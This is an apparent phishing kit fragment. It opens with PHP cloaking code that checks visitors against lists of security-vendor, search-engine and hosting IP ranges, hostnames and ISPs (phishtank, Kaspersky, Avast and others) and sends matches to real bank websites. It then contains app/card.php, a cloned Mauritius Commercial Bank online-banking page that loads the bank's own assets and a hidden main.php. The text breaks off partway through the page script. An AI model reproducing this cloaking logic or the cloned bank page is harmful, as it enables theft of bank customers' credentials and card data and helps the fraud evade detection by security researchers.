15.*','^108.162.246.*','^109.186.*.*','^12.148.196.*','^12.148.209.*','^124.66.185.*','^128.242.*.*','^131.*.*.*','^131.212.*.*','^131.253.*.*','^133.11.204.*','^134.170.2.199','^141.101.104.*','^149.20.*.*','^149.20.54.*','^157.*.*.*','^157.54.*.*','^158.108.*.*','82.102.27.77','^162.158.*.*','^162.158.7.*','^162.158.72.*','^162.158.95.*','^167.24.*.*','^168.188.*.*','^173.194.*.*','^173.194.112.*','^173.194.116.102','^173.194.116.149','^173.245.55.*','^176.195.231.*','^178.43.117.*','^184.173.*.*','^185.2.138.*','^185.28.20.*','^188.165.83.*','^188.244.39.*','^192.115.134.*','^192.118.48.*','^192.232.213.*','^193.220.178.*','^193.221.113.53','^193.253.199.*','^193.47.80.*','^194.153.113.*','^194.52.68.*','^194.72.238.*','^194.90.*.*','^195.128.227.*','^198.25.*.*','^198.41.243.*','^198.54.*.*','^198.60.236.*','^199.30.228.*','^202.*.*.*','^202.108.252.*','^202.160.*.*','^204.*.*.*','^204.14.48.*','^206.207.*.*','^206.253.226.*','^206.28.72.*','^207.*.*.*','^207.126.144.*','^207.46.*.*','^207.46.8.167','^207.46.8.199','^207.68.*.*','^208.65.144.*','^208.76.45.53','^208.84.*.*','^208.91.115.*','^209.191.*.*','^209.73.228.*','^209.85.*.*','^209.85.128.*','^212.143.*.*','^212.150.*.*','^212.235.*.*','^212.29.192.*','^212.29.224.*','^212.50.193.*','^212.8.79.*','^213.*.*.*','^216.239.*.*','^216.239.32.*','^216.252.167.*','^216.33.229.163','^216.58.211.37','^217.132.*.*','^217.16.26.*','^217.74.103.*','^219.*.*.*','^37.128.131.171','^37.140.188.*','^38.100.*.*','^38.105.*.*','^38.144.36.*','^38.74.138.*','^46.116.*.* ','^46.244.*.*','^46.4.120.*','^50.7.*.*','^50.97.*.*','^54.176.*.*','^54.228.218.*','^62.116.207.*','^62.141.65.*','^62.90.*.*','^62.99.77.*','^63.*.*.*','^64.*.*.*','^64.106.213.*','^64.124.14.*','^64.18.*.*','^64.233.*.*','^64.233.160.*','^64.233.173.*','^64.233.191.*','^64.233.191.255*','^64.27.2.*','^64.37.103.*','^64.4.*.*','^64.62.136.*','^64.62.175.*','^64.68.90.*^81.161.59.*','^65.*.*.*','^65.52.*.*','^65.54.188.110','^65.54.188.126','^65.54.188.94','^65.55.206.154','^65.55.33.119','^65.55.33.135','^65.55.37.104','^65.55.37.120','^65.55.37.72','^65.55.37.88','^65.55.85.12','^65.55.92.136','^65.55.92.152','^65.55.92.168','^65.55.92.184','^66.102.*.*','^66.135.200.*','^66.150.14.*','^66.196.*.*','^66.205.64.*','^66.207.120.*','^66.211.160.86*','^66.211.169.3','^66.211.169.66','^66.221.*.*','^66.228.*.*','^66.249.*.*','^67.15.*.*','^67.195.*.*','^67.209.128.*','^68.*.*.*','^68.142.*.*','^68.65.53.71','^69.164.145.*','^69.61.12.*','^69.65.*.*','^72.14.*.*','^72.14.192.*','^72.30.*.*','^72.52.96.*','^74.125.*.*','^74.6.*.*','^78.148.13.*','^8.12.*.*','^82.166.*.*','^83.31.118.*','^83.31.69.*','^85.250.*.*','^85.64.*.*','^85.9.7.*','^87.106.251.*','^89.138.*.*','^89.163.159.214','^91.103.66.*','^91.231.*.*','^91.231.212.*','^92.103.69.*','^93.172.*.*','^93.54.82.*','^94.26.*.*','^95.108.194.*','^95.85.*.*','^98.136.*.*','185.104.120.4','212.83.170.209','87.115.213.2','82.223.27.82','163.172.174.24','37.187.96.202','92.103.69.158');$blocked_words=array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit","avast");$shit_isps=array("DigitalOcean","Amazon","Google","phishtank","net4sec","AVAST Software s.r.o.","BullGuard ApS","PayPal","Hotmail","Yahoo","AOL","Microsoft","Kaspersky Lab","Linode, LLC","MSN","ONLINE S.A.S.","Joshua Peter McQuistan");foreach($bots_agents as $bot_agent){if(substr_count($user_agent,$bot_agent)>0){exit(header('Location: https://particuliers.sg.fr/'));}}foreach($bots_ips as $bot_ip){if(preg_match('/'.$bot_ip.'/',$user_ip)){exit(header('Location: https://www.huntington.com/'));}}foreach($blocked_words as $word){if(substr_count($hostname,$word)>0){exit(header('Location: https://particuliers.sg.fr/'));}}$ipp=isset($user_ip)&&$user_ip!=""?$user_ip:"1.1.1.1";$ISP=@file_get_contents('http://ipinfo.io/'.$ipp.'/org');if($ISP==false){return "ppp";}foreach($shit_isps as $isp){if(substr_count($ISP,$isp)){exit(header('Location: https://particuliers.sg.fr/'));}}?>PK [��\��Ԉ� �� app/card.phpnu W+A�� <?php require '../main.php'; ?> <!--[if lte IE 7]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.css"); </style> <![endif]--> <![if (!IE) | (gte IE 8)]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.uri.css"); </style> <![endif]> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/jquery-migration.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/select2/js/select2.min.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en-US.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en-US.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/jquery.qrcode.min.js" ></script><script> var globalcnt = 1; var useragent = ""; var openWindowArray = new Array(); var message = new Object (); var isHelp= ''; message.maxopen = "Maximum limit reached for number of open windows. Please close a window to open new Transaction."; message.alreadyopen = "Window already Open."; message.addfav = "Add to Favourites"; message.alertstr = "Alert"; function SendDashboardFormRequest (p_frm,p_desc,p_currtxn,p_nosubmitForm) { try{ var windowobj = openWindow(p_frm.fldServiceType.value, p_desc); if(p_nosubmitForm) { return windowobj; } //document.frmtp.fldRequestId.value = defAppId+p_frm.fldServiceType.value+requestId; //document.frmtp.fldServiceType.value = p_frm.fldServiceType.value; if(windowobj) { p_frm.target = windowobj.getFrameName(); p_frm.submit(); } } catch(e) { } } function getPosition(arr,val) { if(arr != null && arr.length > 0) { for(var cnt = 0;cnt < arr.length; cnt++ ) { if(arr[cnt] == val) { return cnt; } } } return -1; } function getPresentWindow(arr,val) { var count=0; if(arr != null && arr.length > 0) { for(var cnt1 = 0;cnt1 < arr.length; cnt1++ ) { if(arr[cnt1] == val) { count++; } } } return count; } function addIntoArray(p_array, p_txn) { p_array.push(p_txn); } function removeFromArray(p_array, p_txn) { var index_value = getPosition(p_array,p_txn); var range = 1; p_array.splice(index_value,range); } function fireMenuHelp(p_txn){ var l_idtxn= ""+ p_txn + ".htm"; var l_default= ""+ p_txn + ".htm"; var features = "directories=no,location=no,menubar=no,status=no,scrollbars=yes," + "toolbar=no,dependant=no,resizable=yes,top=75,left=750," + "scrollbars=yes,width=400,height=500"; addlistWindow = window.open ("static/help.jsp?REFIDTXN="+l_idtxn+"&DEFPATH="+l_default, "details", features); addlistWindow.focus(); //addlistWindow.moveTo(700,80); } $(document).ready(function() { if(useragent=="ipad" || useragent=="android"){ //alert(useragent); if (parent.isMenuClassic()) { var l_height = $( window.parent.frames["frameSet_main"]).height(); var l_width = $( window.parent.frames["frameSet_main"]).width(); var msg_l = $('#MySplitter').width()-200; var msg_p = $('#MySplitter').width(); //alert(l_height); //alert(l_width); //var statusText = top.frames["frame_top"].document.getElementById('topContainer'); var txn_frm = top.frames["frame_txn"].document.getElementById('main'); if(l_width>l_height) { //LANDSCAPE // alert("LANDSCAPE"); // $(statusText).css('width','95%'); $('.workarea').css('width','auto'); $('.workarea').css('overflow','hidden'); $('#MySplitter').css('width',msg_p); $('#main').css('width',msg_l); } else { // Portrait // alert("PORTRAIT"); //$(statusText).css('width','65%'); $('.workarea').css('width',l_width); $('.workarea').css('overflow','auto'); $('#MySplitter').css('width',l_height); $('#main').css('width',msg_p); } } } if(useragent=="ipad"){ if (!parent.isMenuClassic()) { if (parent.frames.length > 0) { var heightDiv = $('form[name="frmmain"]').height() + $(window).height() - 200; $('.contentarea').css({height:heightDiv}); $('body').addClass("mainFrame"); $('form[name="frmmain"]').addClass("mainscroll"); try { $('form[name="frmmain"]').touchScroll({elastic: true, momentum: false}); touchTableScroll('displayTable'); function loaded() { document.addEventListener('touchmove', function(e){ e.preventDefault(); }); myScroll = new iScroll('displayTable', {elastic: false, momentum: false}); } document.addEventListener('DOMContentLoaded', loaded); } catch(e){ } } } }}); </script><style> .calMask { position: absolute; z-index:1000; background:#FFFFFF; border:0px solid; } .calContainer { position: relative; background:#FFFFFF; z-index:1007; border-bottom-color:#FFFFFF; border-color:#FFFFFF; border-left-color:#FFFFFF; border-top-color:#FFFFFF; border-right-color:#FFFFFF; font-color:#6677DD; } .screenMask { position: absolute; height:1000%; width: 1000%; left:0px; top:0px; z-index:1005; background: url('https://ib.mcb.mu/T001/images/transparent.gif'); } .calContent { position: relative; z-index:1010; background:#FFFFFF; border:2px inset; padding: 5px; } .TESTcpYearNavigation, .TESTcpMonthNavigation { background-color:#6677DD; text-align:center; vertical-align:center; text-decoration:none; color:#FFFFFF; font-weight:bold; } .TESTcpDayColumnHeader, .TESTcpYearNavigation, .TESTcpMonthNavigation, .TESTcpCurrentMonthDate, .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDate, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDate, .TESTcpCurrentDateDisabled, .TESTcpTodayText, .TESTcpTodayTextDisabled, .TESTcpText { font-family:arial; font-size:8pt; } TD.TESTcpDayColumnHeader { text-align:right; border:solid thin #6677DD; border-width:0 0 1 0; } .TESTcpCurrentMonthDate, .TESTcpOtherMonthDate, .TESTcpCurrentDate { text-align:right; text-decoration:none; } .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDateDisabled { color:#D0D0D0; text-align:right; text-decoration:line-through; } .TESTcpCurrentMonthDate { color:#6677DD; font-weight:bold; } .TESTcpCurrentDate { color: #FFFFFF; font-weight:bold; } .TESTcpOtherMonthDate { color:#808080; } TD.TESTcpCurrentDate { color:#FFFFFF; background-color: #6677DD; border-width:1; border:solid thin #000000; } TD.TESTcpCurrentDateDisabled { border-width:1; border:solid thin #FFAAAA; } TD.TESTcpTodayText, TD.TESTcpTodayTextDisabled { border:solid thin #6677DD; border-width:1 0 0 0; } A.TESTcpTodayText, SPAN.TESTcpTodayTextDisabled { height:20px; } A.TESTcpTodayText { color:#6677DD; font-weight:bold; } SPAN.TESTcpTodayTextDisabled { color:#D0D0D0; } .TESTcpBorder { border:solid thin #6677DD; } .printWarning { display:none; } .noPrintWarning { display:none; } </style><style media="print" > .printWarning { display:inline-block; } .noPrintWarning { display:none; } </style><div id="testdiv1" style="position:absolute;visibility:hidden;background-color:white;layer-background-color:white;z-index:10005" ></div><div class="screenMask" id="calenderMask" style="position:absolute;display:none;background-color:white" onclick="hide_Cal();" ></div><script type="text/javascript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" > var idEntity = 'T001'; var l_appLayWidth = 0; window.parent.scrollTo(0,0); //----------------------------------------------------------------------------------------------------------------------- function setPageHeight(){ var height = 0,window_header_height=0;; var body = document.body, html = document.documentElement; var position=window.parent.pageYOffset; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); if('BFV'==idtxn){ height = 1700; } height = height + window_header_height; if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } window.parent.scrollTo(0,position); } //----------------------------------------------------------------------------------------------------------------------- if(idEntity=='T001'){ $(document).ready(function(){ $("td:empty").html(" "); }); $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } var height = 0,window_header_height=0; var body = document.body, html = document.documentElement; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); height = height + window_header_height; if('BFV'==idtxn){ height = 1700; } if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); if(idtxn == "MAR"){ var desc = $("#pageheading").html(); }else{ var desc = $("#pageheading").text(); } var note = null; if(idtxn != 'DTF'){ note = $("#pageheadernote").text(); }else{note = $("#pageheadernote").html();} /* if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; }*/ if(idtxn =="EMF"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Ways to Bank</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Register to e-statements</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="COU"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Help & Contact us</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Contact us</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="TDA"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Accounts & Products</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Fixed deposits</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Amend automatic renewal</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } var content = ''; var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); $windowControls.siblings('.window_title_error').empty(); if ($windowControls.siblings('.window_title_error').length == 0) { $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); if(typeof content == "undefined") { content = $("#dialog-modal-error").text(); } //alert("content "+content); $windowControls.before("<div class='window_title_error active' >"+content+ "</div>"); }else{ $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); $windowControls.siblings('.window_title_error').html(content); } if ($windowControls.siblings('.window_title_header').length == 0) { $windowControls.before("<div class='window_title_header active' >" + desc + "</div>"); }else{ $windowControls.siblings('.window_title_header').html(desc); } if ($windowControls.siblings('.window_title_note').length == 0) { $windowControls.before("<div class='window_title_note active' >" + note + "</div>"); }else{ $windowControls.siblings('.window_title_note').html(note); } }); } } catch(e) { } }else { $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var desc = $("#pageheading").text(); if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; } var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); if ($windowControls.siblings('.window_title_timestamp').length == 0) { if (top.isAuthTxnOnly != 'Y') { $windowControls.before("<div class='window_title_timestamp active' >" + $('#pageheadingdate').text() + "</div>"); } }else{ if (top.isAuthTxnOnly != 'Y') { $windowControls.siblings('.window_title_timestamp').text($('#pageheadingdate').text()); } } }); } } catch(e) { } } var popup_txnid=""; var popup_seq=""; var popup_target=""; var popup_win_name=""; var flgbtn=false; var highlightedTabs = new Array (); var helptxn='USR'; //----------------------------------------------------------------------------- function displayStatusMessage () { var idtxn = 'RRUSR01'; if(idtxn) { idtxn = idtxn.substring(2,5); } var totalcnt = 0 + 0; //+ 0; if(totalcnt == 0) { if (window.parent.frames['messageFrame']) { window.parent.frames['messageFrame'].resetErrors(); } else if (window.top.frames['messageFrame']) { window.top.frames['messageFrame'].resetErrors(); } } checkForAuditLogFrame(); } //----------------------------------------------------------------------------- $(function () { var count = 0 + 0 + 0; var idEntity = 'T001'; if(idEntity == 'T001'){ if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } );*/ }else{ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } );*/ } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } }else { if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } ); }else{ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } ); } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } } }) //----------------------------------------------------------------------------- function minimizeMessages () { var msgFrame; var msg_text = "Click here to view messages..." var l_footer_content = '<div id="msg_' + document.frmmain.fldServiceType.value + '" class="msgFrame">'; l_footer_content += '<img src="images/list_errors.gif" align="abdMiddle" title="' + msg_text +'" id="msg_' + document.frmmain.fldServiceType.value + '_img" >'; //l_footer_content += ' ' + msg_text l_footer_content += '</div>'; if (window.top.frames ["messageFrame"]) { msgFrame = $("#errorTab", window.top.frames ["messageFrame"].document); parent.document.getElementById('dataframe').rows = "25,*"; } else { msgFrame = $("#errorTab"); msgFrame.show(); document.getElementById('errorTab').style.display = 'inline-block'; } msgFrame.html (l_footer_content); msgFrame.click ( function () { $('#dialog-modal-error').dialog ('open'); $("#dialog-modal-error").css("min-height", ""); /*$('#dialog-modal-error').parent().css( { position:'absolute !important', left:'auto !important', right:'0px !important', top:'24px!important' });*/ } ); } //----------------------------------------------------------------------------- function highlightTab (p_tab_id) { var l_tab_obj, imageid, test, image1; if (highlightedTabs.length > 0 && highlightedTabs.contains (p_tab_id)) { l_tab_obj = document.getElementById (p_tab_id); imageid = l_tab_obj.id + "image"; test = l_tab_obj; image1 = document.createElement("img"); image1.setAttribute('id',imageid); image1.setAttribute('src','images/red_error.gif'); image1.setAttribute('align','absMiddle'); image1.className='errorImg'; test.childNodes [0].insertBefore(image1); addIntoArray (highlightedTabs, p_tab_id); /*$("#"+imageid).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ } } //----------------------------------------------------------------------------- function markErrorField (p_err_field, err_message){ markErrorField(p_err_field, err_message, 'default', 'default'); } //----------------------------------------------------------------------------- function markErrorField(p_err_field, err_message, p_targetPos, p_tooltipPos){ $(p_err_field).css ('border', '1px solid red'); $(p_err_field).css ('background-color', 'rgb(255, 240, 240)'); $(p_err_field).attr ('title', err_message); /*$(p_err_field).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ if(p_targetPos == 'default') p_targetPos = 'topMiddle'; if(p_tooltipPos == 'default') p_tooltipPos = 'bottomMiddle'; $(p_err_field).qtip({ position: { corner: { target: p_targetPos, tooltip: p_tooltipPos } }, style: { name: 'red', padding: '7px 13px', width: { max: 210, min: 0 }, tip: true } }); } //----------------------------------------------------------------------------- function initError(){ //Initialize Error } //----------------------------------------------------------------------------- function displayErrorMessage () { cnt = 0; totalcnt = 0; var arrErrorCode = new Array(); var arrErrorDesc = new Array(); var arrWarningCode = new Array(); var arrWarningDesc = new Array(); var arrInfoCode = new Array(); var arrInfoDesc = new Array(); var arrSuccessCode = new Array(); var arrSuccessDesc = new Array(); totalcnt = totalcnt + cnt; cnt = 0; totalcnt = totalcnt + cnt; } //----------------------------------------------------------------------------- function displayBulkStatusMessage () { return; } //----------------------------------------------------------------------------- function Draft ( P_idTxn , p_seqNo ) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function Draft(P_idTxn) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate ( P_idTxn , p_seqNo ) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate (P_idTxn) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function PrintPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "PrintPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "PrintPopup"; p_form.submit(); addlistWindow.focus(); } //------------------------------------------------------------------------------ function DowloadPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "DowloadPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "DowloadPopup"; p_form.submit(); addlistWindow.focus(); } //----------------------------------------------------------------------------- function getChangeFieldColor(){ var arr_fldchanged = new Array (); var arr_prevval = new Array (); var arr_idx = 0; var len = 0; var i; arr_idx = 0; len =arr_fldchanged.length; for(i=0;i<len;i++){ if(document.getElementById(arr_fldchanged[i]) != null && document.getElementById(arr_fldchanged[i]) != "undefined"){ document.getElementById(arr_fldchanged[i]).className = "ColHeadingLeftAlignedBold"; } } } //-------------------------------------------------------------------------------------- function defaultfunction(){ return true; } //-------------------------------------------------------------------------------------- function fnFixDecimalPlaces ( p_val , p_places ) { if ( p_val == '' || isNaN (p_val) || isNaN (p_val) || (p_places != '0' && p_places == '')) { return ''; } return (parseFloat (p_val)).toFixed (p_places); } //-------------------------------------------------------------------------------------- function fnSubmitForm () { try { if (parent.popupWindow) { parent.popupWindow.top.frames [1].name = 'txn_'+parent.idsession; document.frmmain.target = 'txn_'+parent.idsession; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldRequestId.value = "RR"+popup_txnid+popup_seq; document.frmmain.submit (); document.frmmain.target = ""; } } catch (e) { } } //-------------------------------------------------------------------------------------- function call_Popup ( p_feature , p_txnid , p_seqno , p_target ){ try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. parent.popupWindow = null; } } catch (e) { } popup_win_name = 'popup_'+parent.iduser; popup_txnid = p_txnid; popup_seq = p_seqno; parent.popupWindow = window.open ("defaultflexcubepopup.html",popup_win_name, p_feature) } //-------------------------------------------------------------------------- function fnOnBodyUnload () { try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. } } catch (e) { } } //-------------------------------------------------------------------------- function isTxnInRole (p_txn){ var p_success = false; for (var i=0;i < arr_grp__txnid.length; i++){ if (arr_grp__txnid [i] == p_txn) { p_success=true; } } return p_success; } //------------------------------------------------------------------------------ function view_attached_docs() { SendTxnRequest('03','VAI'); } //------------------------------------------------------------------------------ function fnAttachDocuments(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; //document.frmmain.fldRequestId.value="RRALI02"; document.frmmain.fldSectionId.value="RRALI02"; document.frmmain.fldServiceType.value="ALI"; document.frmmain.fldtableid.value=p_tableid; document.frmmain.fldrowid.value=p_rowid; document.frmmain.fldbtnflag.value=p_buttonid; call_Popup ( features , 'ALI' , '02' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnAttachFilesForMailBox(p_tableid,p_rowid,p_buttonid) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; document.frmmain.target = "txn"; document.getElementById('fldSessionId').value = parent.idsession; document.getElementById('fldSectionId').value = "RRIMS92"; document.getElementById('fldServiceType').value = "IMS"; document.getElementById('fldtableid').value = p_tableid; document.getElementById('fldrowid').value = p_rowid; document.getElementById('fldbtnflag').value = p_buttonid; call_Popup ( features , 'IMS' , '92' , 'txn' ); document.frmmain.target = ""; } //------------------------------------------------------------------------------ function fnOriginationsPopUpOpen(p_reqid,p_txnid,p_iddevice,p_features) { var idrequest = 'RR'+p_txnid+p_reqid; document.frmmain.target = "txn"; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldSectionId.value = idrequest; document.frmmain.fldServiceType.value= "ORG"; document.frmmain.fldDataId.value = dataid; call_Popup ( p_features , p_txnid , p_reqid , 'txn' ); document.frmmain.target = ""; return; } //------------------------------------------------------------------------------ function fnEreceiptsPopUpOpen(idRequestNum) { var height = window.innerHeight; var width = window.innerWidth; var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=" + (0.9*height) + ",width=" + (0.9 * width) + ",top=" + (height * 0.1) + ",left=" + (width * 0.1) + ",status=yes"; if(idRequestNum){ call_Popup ( features , 'ERC' , idRequestNum , 'txn' ); } else{ call_Popup ( features , 'ERC' , '01' , 'txn' ); } } //------------------------------------------------------------------------------ function fnRemove(p_sectionid,p_requestid) { document.frmmain.target=""; document.frmmain.flddelrefno.value =""; document.frmmain.fldfilerefno.value =""; for (var i=0;i < document.frmmain.elements.length;i++) { if (document.frmmain.elements[i].type=='checkbox' && document.frmmain.elements[i].name=="fldattachedfiles" ) { if(document.frmmain.elements[i].checked==false) { document.frmmain.fldfilerefno.value = document.frmmain.elements[i].value+'~'+document.frmmain.fldfilerefno.value; } if(document.frmmain.elements[i].checked==true) { flgbtn=true; document.frmmain.flddelrefno.value = 